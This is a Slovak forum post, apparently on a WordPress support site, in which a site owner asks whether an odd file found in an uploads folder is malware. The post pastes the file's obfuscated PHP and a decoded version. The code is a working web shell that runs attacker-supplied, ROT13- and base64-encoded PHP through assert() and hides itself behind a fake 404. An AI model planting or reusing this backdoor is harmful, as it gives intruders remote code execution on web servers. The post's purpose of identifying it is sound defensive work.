Je to malware ?
-
Ahojte,
v zložke /www_root/wp-content/uploads/js_composer mám divný súbor thumbs_img.php a jeho obsah je zakódovaný:
<?php if(isset($_POST[chr(100)."a"."\x74"."\x61"])){$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])));die;} else{ if(function_exists('headers_sent') && !headers_sent()){ header('HTTP/1.0 404 Not Found',TRUE); header('Status: 404 Not Found',TRUE); } } ?>
po decryptovaní je takýto:
if(isset($_POST["data"])){$ohx="assert";$twu="base64_decode";$ye="str_rot13";@$ohx(@$twu(@$ye($_POST["data"])));die;} else{ if(function_exists('headers_sent') && !headers_sent()){ header('HTTP/1.0 404 Not Found',TRUE); header('Status: 404 Not Found',TRUE); } }
je to malware alebo normálny kód ?
- Téma ‘Je to malware ?’ uzatvorená pre ďalšie odpovede.